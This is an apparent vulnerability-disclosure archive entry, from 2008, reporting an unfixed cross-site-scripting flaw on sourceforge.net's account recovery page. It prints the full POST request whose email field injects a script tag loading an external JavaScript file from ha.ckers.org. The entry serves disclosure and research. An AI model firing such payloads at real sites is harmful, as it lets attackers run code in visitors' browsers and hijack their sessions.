Security researcher mox, has submitted on 20/03/2008 a cross-site-scripting (XSS) vulnerability affecting sourceforge.net, which at the time of submission ranked 198 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 31/03/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 20/03/2008 |
Date published: 31/03/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: mox |
Domain: sourceforge.net |
Category: XSS |
Pagerank: 198 |
URL: https://sourceforge.net/account/registration/recover.php |
POST: formsubmit=true&method=email&email=%22%2F%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3F%2F %3E&user_name=&answer=&username=&realname=&support_email=&support_email2=&support_email3=&support_ac count=&message= |
Click here to view the mirror
|
|
|